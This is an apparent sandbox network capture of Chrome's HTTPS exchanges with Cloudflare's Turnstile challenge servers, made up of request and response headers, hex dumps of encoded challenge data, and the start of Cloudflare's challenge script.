                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2039740840:1727987324:6iAWAvvaUE-RR1f5VjEdMpMjA0FAo4zmykNisH4-Eow/8ccfd86f5fc70ca2/54bb74df38cddf8 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3111
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 54bb74df38cddf8
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/n0t9y/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC3111OUTData Raw: 76 5f 38 63 63 66 64 38 36 66 35 66 63 37 30 63 61 32 3d 64 41 47 6e 68 6e 6f 6e 41 6e 24 6e 2d 25 32 62 74 55 2b 74 4f 6e 2b 42 33 79 43 77 2b 75 74 43 74 73 57 42 34 59 50 74 7a 62 61 74 50 50 2b 4c 74 53 74 58 42 75 79 4b 50 74 56 74 4a 6e 30 79 74 75 74 4d 68 47 6e 67 74 34 42 2b 24 74 36 48 7a 59 65 34 74 30 69 74 34 43 74 2b 66 74 43 62 72 41 4d 6a 74 46 42 33 6b 71 36 65 59 50 7a 50 4d 74 75 69 30 76 37 54 66 50 32 74 5a 74 33 6f 4e 61 58 57 31 39 51 4d 43 2b 6e 75 4b 2b 62 74 75 47 74 59 24 57 47 63 72 57 46 35 72 43 51 43 72 50 74 78 45 47 74 42 6e 42 47 47 53 50 74 62 78 6e 74 6a 45 62 74 4a 6e 71 47 69 74 30 46 74 71 67 59 46 71 4b 77 61 2b 72 77 74 61 79 74 4e 6e 74 57 43 74 30 57 54 48 62 74 67 6e 74 36 33 74 30 7a 4e 55 4f 7a 70 4e 47 30 53
                                                                                                                                                                                                                                Data Ascii: v_8ccfd86f5fc70ca2=dAGnhnonAn$n-%2btU+tOn+B3yCw+utCtsWB4YPtzbatPP+LtStXBuyKPtVtJn0ytutMhGngt4B+$t6HzYe4t0it4Ct+ftCbrAMjtFB3kq6eYPzPMtui0v7TfP2tZt3oNaXW19QMC+nuK+btuGtY$WGcrWF5rCQCrPtxEGtBnBGGSPtbxntjEbtJnqGit0FtqgYFqKwa+rwtaytNntWCt0WTHbtgnt63t0zNUOzpNG0S
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC717INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:39 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 152208
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: xDl5zbK6tNZT1XZNhEx5ErDwe6ZeBDAcYVZKvUQSkXenRu/YRXiYUtnzLazs+xb8U4MS5alsN3vIoLZpETczTQ6095gsoQcUuAPqj3tx34VV/swgsYaKUstmCKuEnATipy0vOhHSGpDvDIsqN7x0KhMj/bms/so43xkhfTvfdjtm5tVCsXgKuddAwygPIxqczZ5hhNb0mHgIkYB1jgP3Upzu3buyuy10OiAW+1d8u7mVqXb6oK167P7HMsEjMdHSHAAi1o9YHfZrq572vSfUxGFWAnn9vUifDjFn3f1RMnQYc0+H9zD3WZGV1hrveb3h+dWog9LEA6RIOTdNd1PLcJAij6KOP9UukAiH/9Tla05ObkAfYp8KFFGFxmMclUuDOGs9jN868GPj5GSisHJzfaaBFBnA/OSLJU+fleOTILvLV0NFeOVlJeit8PNb3fnYiVOqBNe8PzMLbnE5+rf9iCnR7z+lzvytaTd7aGl8g+ahPd0=$ZNAvf0cmv7y00IiF
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8857fb9c330-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC652INData Raw: 55 35 53 44 56 46 4a 32 64 70 42 38 6a 6c 52 6f 6b 34 71 63 65 71 43 64 59 33 6c 67 67 5a 79 71 6e 6f 43 6f 69 57 69 72 73 71 4e 77 6f 49 69 65 6f 61 2b 59 6a 5a 65 53 69 49 32 39 71 61 47 68 72 62 75 75 6d 61 4f 79 6c 4c 79 45 74 34 58 4f 77 6f 2f 4d 71 73 79 39 74 4d 69 54 31 70 48 61 7a 63 62 59 75 70 66 4c 7a 74 4b 63 30 4c 6a 48 36 4c 33 49 34 4e 58 6a 77 4d 48 4c 78 65 62 44 71 39 36 39 31 4f 48 76 30 4d 33 59 39 64 44 79 76 4c 37 55 39 72 33 77 30 77 66 43 42 4f 6a 72 39 51 4d 50 34 65 73 4e 2b 67 50 4f 31 50 34 48 30 67 55 4a 46 42 76 6c 48 41 72 31 36 75 37 38 46 51 41 61 49 66 4d 54 48 51 49 72 36 51 41 47 4d 4f 67 66 4b 2b 34 68 43 53 7a 7a 44 77 6a 32 39 53 67 2f 48 53 6f 33 2b 50 34 39 48 68 55 59 49 77 64 4a 41 54 51 33 52 7a 67 4f 47 67 6f
                                                                                                                                                                                                                                Data Ascii: U5SDVFJ2dpB8jlRok4qceqCdY3lggZyqnoCoiWirsqNwoIieoa+YjZeSiI29qaGhrbuumaOylLyEt4XOwo/Mqsy9tMiT1pHazcbYupfLztKc0LjH6L3I4NXjwMHLxebDq9691OHv0M3Y9dDyvL7U9r3w0wfCBOjr9QMP4esN+gPO1P4H0gUJFBvlHAr16u78FQAaIfMTHQIr6QAGMOgfK+4hCSzzDwj29Sg/HSo3+P49HhUYIwdJATQ3RzgOGgo
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 55 33 4b 41 65 56 31 77 57 57 41 39 50 58 4e 44 56 34 70 6a 58 45 65 44 6a 32 79 4d 62 6f 65 44 6b 32 32 44 69 6d 57 51 55 6e 75 53 6b 56 5a 2f 63 4a 5a 34 66 36 5a 65 6f 6d 57 49 61 33 2b 47 72 57 74 36 6b 6f 2b 4d 66 35 43 77 71 37 64 30 65 70 75 33 6d 58 69 67 71 73 43 4b 74 72 4b 36 6b 4c 76 48 78 62 53 30 72 59 61 75 72 4d 47 6e 72 36 6a 51 7a 70 57 54 30 73 71 61 6c 63 61 64 33 5a 36 71 30 71 48 65 76 61 47 6d 33 4e 69 6c 76 36 50 65 76 63 76 63 76 4c 76 42 73 61 62 4b 73 62 57 71 7a 76 43 35 72 74 48 65 76 62 4c 56 30 73 47 32 32 63 48 46 75 74 30 42 79 62 37 67 37 73 33 43 35 4f 4c 52 78 75 6a 52 31 63 72 73 45 64 6e 4f 39 2f 37 64 30 76 76 75 31 53 45 6d 45 75 58 61 42 4f 4c 31 41 75 73 73 36 75 67 46 42 51 45 77 4b 6a 45 48 44 7a 59 31 43 78 51
                                                                                                                                                                                                                                Data Ascii: U3KAeV1wWWA9PXNDV4pjXEeDj2yMboeDk22DimWQUnuSkVZ/cJZ4f6ZeomWIa3+GrWt6ko+Mf5Cwq7d0epu3mXigqsCKtrK6kLvHxbS0rYaurMGnr6jQzpWT0sqalcad3Z6q0qHevaGm3Nilv6PevcvcvLvBsabKsbWqzvC5rtHevbLV0sG22cHFut0Byb7g7s3C5OLRxujR1crsEdnO9/7d0vvu1SEmEuXaBOL1Auss6ugFBQEwKjEHDzY1CxQ
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 59 56 79 65 49 46 46 58 33 78 37 52 6e 6c 48 68 48 39 66 66 47 46 31 6a 45 39 76 64 4a 64 57 6d 59 36 62 57 70 79 53 6e 31 39 31 6c 71 4e 6a 65 49 52 6e 61 58 31 6e 71 32 75 44 6a 59 4a 74 73 47 75 6e 6c 4c 4e 77 6f 33 57 30 75 36 68 38 66 62 2b 73 64 59 48 44 73 72 65 46 78 37 61 2f 69 63 75 36 78 36 32 75 70 38 4c 42 6b 4d 37 4d 71 37 57 5a 32 4c 48 62 32 72 61 2f 72 74 62 65 73 37 66 59 72 39 48 43 36 75 61 31 36 2b 53 70 77 38 36 6b 38 4f 4f 77 38 65 33 6d 74 50 62 53 38 72 57 2b 37 4f 76 64 76 4f 44 7a 42 66 54 35 32 4e 50 44 33 65 48 6f 78 63 33 43 35 4f 4c 52 78 75 6a 52 31 63 72 73 45 64 6e 4f 39 2f 37 64 30 76 76 75 31 53 45 6d 45 75 58 61 42 4f 4c 31 41 75 73 73 36 75 6a 78 45 41 44 30 48 6a 45 48 44 7a 59 31 43 78 51 78 48 51 38 68 49 66 51 57
                                                                                                                                                                                                                                Data Ascii: YVyeIFFX3x7RnlHhH9ffGF1jE9vdJdWmY6bWpySn191lqNjeIRnaX1nq2uDjYJtsGunlLNwo3W0u6h8fb+sdYHDsreFx7a/icu6x62up8LBkM7Mq7WZ2LHb2ra/rtbes7fYr9HC6ua16+Spw86k8OOw8e3mtPbS8rW+7OvdvODzBfT52NPD3eHoxc3C5OLRxujR1crsEdnO9/7d0vvu1SEmEuXaBOL1Auss6ujxEAD0HjEHDzY1CxQxHQ8hIfQW
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 64 45 53 6d 65 4a 62 58 47 54 68 6f 64 51 6a 6f 68 72 64 56 64 56 66 4a 79 58 66 5a 74 75 67 58 56 36 70 56 2b 55 6d 47 47 56 69 70 78 6c 62 71 53 51 62 48 4b 30 6b 6d 36 68 75 4b 79 4a 6b 4b 53 73 65 48 36 30 71 6e 79 43 74 4c 5a 2b 73 63 69 34 68 49 71 44 76 72 76 43 6d 70 79 62 71 4e 4b 6e 71 4c 47 71 6c 73 4b 52 31 71 75 76 6c 61 36 71 30 72 33 58 34 72 48 51 32 73 66 6d 34 72 33 42 37 61 62 46 37 65 37 65 34 4d 4c 7a 7a 2b 44 6a 32 76 44 51 32 66 7a 64 74 65 75 38 39 38 75 36 2f 4f 54 65 36 4f 69 38 33 51 4d 4f 78 76 7a 75 7a 75 63 49 30 4d 2f 73 34 67 2f 55 46 67 33 39 35 76 59 56 34 4f 6e 2b 32 53 4d 6a 33 78 33 36 38 53 48 6d 35 75 30 4d 41 78 77 4f 41 77 55 6a 4e 54 55 79 43 52 6f 78 2b 52 41 61 45 7a 45 67 2b 66 51 58 4a 42 4d 6c 46 79 6b 72 4f
                                                                                                                                                                                                                                Data Ascii: dESmeJbXGThodQjohrdVdVfJyXfZtugXV6pV+UmGGVipxlbqSQbHK0km6huKyJkKSseH60qnyCtLZ+sci4hIqDvrvCmpybqNKnqLGqlsKR1quvla6q0r3X4rHQ2sfm4r3B7abF7e7e4MLzz+Dj2vDQ2fzdteu898u6/OTe6Oi83QMOxvzuzucI0M/s4g/UFg395vYV4On+2SMj3x368SHm5u0MAxwOAwUjNTUyCRox+RAaEzEg+fQXJBMlFykrO
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 43 69 34 79 57 67 32 6c 74 6d 56 4a 79 5a 6c 6c 65 56 5a 5a 64 6e 5a 57 42 67 6e 75 57 6e 47 53 69 6f 48 2b 4c 62 70 69 6d 61 70 75 53 6b 33 43 78 72 4b 68 79 70 4c 79 5a 65 70 4b 53 75 58 75 67 6e 48 79 6c 73 4c 47 59 6b 35 69 64 77 73 32 47 72 72 47 4d 79 37 79 31 6a 5a 62 59 79 5a 62 56 6b 37 54 4c 72 4b 71 74 7a 74 62 41 74 39 62 61 78 4c 76 61 71 71 58 68 32 65 43 75 33 64 6e 4d 77 37 37 74 34 50 4c 54 39 2f 62 6f 36 62 72 55 36 4f 48 4f 33 39 37 6b 34 51 50 5a 41 41 72 43 43 65 72 4b 34 77 54 49 79 63 54 6d 39 64 41 53 44 65 7a 52 42 77 33 6d 32 74 37 58 2b 77 30 42 38 76 50 76 37 68 76 61 33 78 73 73 41 2b 4d 66 34 51 66 6e 49 2f 41 4c 36 79 6b 73 44 2b 38 74 4b 78 51 33 4f 54 55 74 39 7a 55 2f 48 54 63 7a 42 76 6f 66 4a 68 35 44 54 67 63 6e 47 77
                                                                                                                                                                                                                                Data Ascii: Ci4yWg2ltmVJyZlleVZZdnZWBgnuWnGSioH+LbpimapuSk3CxrKhypLyZepKSuXugnHylsLGYk5idws2GrrGMy7y1jZbYyZbVk7TLrKqtztbAt9baxLvaqqXh2eCu3dnMw77t4PLT9/bo6brU6OHO397k4QPZAArCCerK4wTIycTm9dASDezRBw3m2t7X+w0B8vPv7hva3xssA+Mf4QfnI/AL6yksD+8tKxQ3OTUt9zU/HTczBvofJh5DTgcnGw
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 62 35 4b 55 63 56 79 55 57 58 4e 39 56 48 4b 61 59 46 69 67 69 57 4f 44 69 4a 75 6d 5a 34 2b 6f 71 61 78 74 72 59 36 32 71 6f 43 48 63 61 57 4d 6b 71 69 52 74 35 78 38 6c 5a 6e 46 66 70 32 42 67 72 57 34 74 6f 69 41 78 61 32 78 7a 63 4c 49 72 72 53 6a 6c 63 48 57 72 62 4c 64 6c 72 37 42 6e 4e 76 4d 78 5a 32 6d 36 4e 6d 6d 32 63 6a 4c 77 38 7a 4f 34 4f 6a 47 37 73 32 78 38 74 4c 6e 74 4e 6e 4e 30 66 32 32 31 62 6d 36 37 66 44 75 77 4c 6a 39 35 65 6b 47 2b 67 48 6d 37 4e 76 4e 2b 51 2f 6c 36 68 62 4f 46 66 6e 55 46 65 6f 4e 32 52 76 36 45 4e 37 31 44 51 62 64 35 69 6b 61 35 68 6f 4a 44 67 51 4e 44 79 45 70 4c 53 38 4f 38 54 4d 54 4b 50 51 61 44 68 4d 2b 39 68 38 55 2b 68 6b 62 4f 66 34 79 53 54 6b 46 53 69 6b 38 42 78 30 74 48 6a 4a 45 52 30 30 52 54 30 55
                                                                                                                                                                                                                                Data Ascii: b5KUcVyUWXN9VHKaYFigiWODiJumZ4+oqaxtrY62qoCHcaWMkqiRt5x8lZnFfp2BgrW4toiAxa2xzcLIrrSjlcHWrbLdlr7BnNvMxZ2m6Nmm2cjLw8zO4OjG7s2x8tLntNnN0f221bm67fDuwLj95ekG+gHm7NvN+Q/l6hbOFfnUFeoN2Rv6EN71DQbd5ika5hoJDgQNDyEpLS8O8TMTKPQaDhM+9h8U+hkbOf4ySTkFSik8Bx0tHjJER00RT0U
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 58 4e 39 56 48 4b 61 59 46 69 67 69 57 4f 44 69 4a 32 6d 5a 34 65 6f 71 61 78 70 74 4b 61 33 71 37 4b 46 70 4b 36 62 75 6f 61 63 73 4a 65 66 77 70 47 69 6b 62 71 37 70 35 53 56 6e 34 75 59 77 70 69 6d 71 73 53 55 6e 74 53 6e 6b 34 75 4d 32 61 32 31 71 62 37 62 6c 37 72 4c 74 74 75 39 35 4f 4b 7a 74 63 65 6b 74 39 75 6d 77 62 44 47 79 72 4b 7a 76 76 4c 42 7a 74 4c 30 76 4d 66 71 32 73 2b 7a 74 41 4c 57 33 66 66 6d 42 62 2f 69 2f 63 77 4d 77 4f 48 6c 37 77 58 4c 2f 73 7a 52 31 74 55 53 46 64 55 64 44 77 6b 62 2b 39 77 50 46 52 62 69 49 68 30 55 39 67 6e 35 4b 67 38 66 4b 43 6b 7a 49 41 59 4b 4e 75 34 31 42 2f 55 52 45 79 62 35 46 43 6b 54 2b 66 51 66 50 41 41 64 4f 54 6f 44 4a 43 6b 39 42 78 30 78 48 6a 49 75 53 30 30 52 54 51 34 73 4f 45 63 33 56 42 74 4a
                                                                                                                                                                                                                                Data Ascii: XN9VHKaYFigiWODiJ2mZ4eoqaxptKa3q7KFpK6buoacsJefwpGikbq7p5SVn4uYwpimqsSUntSnk4uM2a21qb7bl7rLttu95OKztcekt9umwbDGyrKzvvLBztL0vMfq2s+ztALW3ffmBb/i/cwMwOHl7wXL/szR1tUSFdUdDwkb+9wPFRbiIh0U9gn5Kg8fKCkzIAYKNu41B/UREyb5FCkT+fQfPAAdOToDJCk9Bx0xHjIuS00RTQ4sOEc3VBtJ
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 5a 66 6d 70 65 64 64 6e 68 6a 61 4b 70 2f 67 34 35 39 69 5a 61 47 69 4a 43 34 6b 58 74 36 6c 72 36 79 69 4c 4b 67 6e 59 36 68 6d 71 4a 2b 74 59 47 31 77 36 57 65 68 38 4b 2f 78 5a 36 67 69 35 44 53 70 36 75 32 70 62 47 2b 72 72 43 34 34 4c 6d 6a 31 4e 62 44 33 72 33 4a 79 73 58 44 77 2b 62 6f 78 62 44 6f 72 63 66 52 71 4d 62 75 74 4b 7a 30 33 62 66 58 33 4f 2f 36 75 2b 50 38 2f 51 48 42 43 66 72 30 42 2b 6e 4b 7a 67 45 43 7a 51 34 4a 2f 74 41 54 37 42 6b 4c 32 52 63 51 48 52 76 36 45 74 72 55 2f 67 4d 68 32 42 6b 61 35 68 63 64 44 4f 63 46 42 79 6b 78 4c 77 63 6d 37 69 4d 70 44 76 49 55 4b 51 34 4c 48 52 4d 68 49 77 38 68 4e 68 77 37 51 54 6c 43 52 55 63 74 43 67 46 42 4b 41 77 70 52 54 52 56 55 6b 6b 34 45 77 31 4d 47 52 6c 4f 50 56 45 34 47 7a 4d 37 50
                                                                                                                                                                                                                                Data Ascii: ZfmpeddnhjaKp/g459iZaGiJC4kXt6lr6yiLKgnY6hmqJ+tYG1w6Weh8K/xZ6gi5DSp6u2pbG+rrC44Lmj1NbD3r3JysXDw+boxbDorcfRqMbutKz03bfX3O/6u+P8/QHBCfr0B+nKzgECzQ4J/tAT7BkL2RcQHRv6EtrU/gMh2Bka5hcdDOcFBykxLwcm7iMpDvIUKQ4LHRMhIw8hNhw7QTlCRUctCgFBKAwpRTRVUkk4Ew1MGRlOPVE4GzM7P
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1369INData Raw: 65 6f 6f 79 44 6f 6e 4a 74 6a 34 71 33 64 71 57 68 6c 49 36 6c 6c 72 36 79 69 4c 4b 67 6e 59 36 68 6d 71 4a 2b 74 59 47 31 77 36 57 65 68 38 4b 2f 78 5a 36 67 69 35 44 53 70 36 75 32 70 62 47 2b 72 72 43 34 34 4c 6d 6a 6f 72 37 6d 32 72 44 61 79 4d 57 32 79 63 4c 4b 70 74 32 70 33 65 76 4e 78 71 2f 71 35 2b 33 47 79 4c 4f 33 30 64 58 66 39 4c 76 30 39 4f 62 47 78 51 49 46 78 51 33 2b 2b 41 76 72 7a 50 34 46 42 74 49 53 44 51 54 6d 2b 4f 6b 61 2f 67 38 59 47 53 4d 51 39 66 6b 6d 33 67 63 69 34 67 45 44 49 65 59 61 4d 53 48 73 37 41 59 4d 4e 75 38 58 42 2f 55 52 45 79 62 35 46 43 6a 36 2f 68 6b 62 50 41 4d 63 4e 54 4d 46 2f 45 55 62 43 55 73 6e 4d 67 38 6e 44 6a 59 6a 46 6b 6f 32 4f 6c 5a 4c 54 7a 63 39 4e 42 35 4b 58 7a 5a 64 5a 68 38 33 59 69 52 42 4f 31
                                                                                                                                                                                                                                Data Ascii: eooyDonJtj4q3dqWhlI6llr6yiLKgnY6hmqJ+tYG1w6Weh8K/xZ6gi5DSp6u2pbG+rrC44Lmjor7m2rDayMW2ycLKpt2p3evNxq/q5+3GyLO30dXf9Lv09ObGxQIFxQ3++AvrzP4FBtISDQTm+Oka/g8YGSMQ9fkm3gci4gEDIeYaMSHs7AYMNu8XB/UREyb5FCj6/hkbPAMcNTMF/EUbCUsnMg8nDjYjFko2OlZLTzc9NB5KXzZdZh83YiRBO1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                132192.168.2.449892104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ccfd84d0859428f/1727989054307/1b1c2e8345996f0791b87668bcd9721ece3a7bc9367547aa772aa6d021fc8fb9/FoEK8nluJDkZAuy HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:39 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 47 78 77 75 67 30 57 5a 62 77 65 52 75 48 5a 6f 76 4e 6c 79 48 73 34 36 65 38 6b 32 64 55 65 71 64 79 71 6d 30 43 48 38 6a 37 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gGxwug0WZbweRuHZovNlyHs46e8k2dUeqdyqm0CH8j7kAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                2024-10-03 20:57:39 UTC1INData Raw: 4a
                                                                                                                                                                                                                                Data Ascii: J


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                133192.168.2.449893104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd86f5fc70ca2&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:40 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 117092
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd88b7febc34a-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69
                                                                                                                                                                                                                                Data Ascii: %20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20si
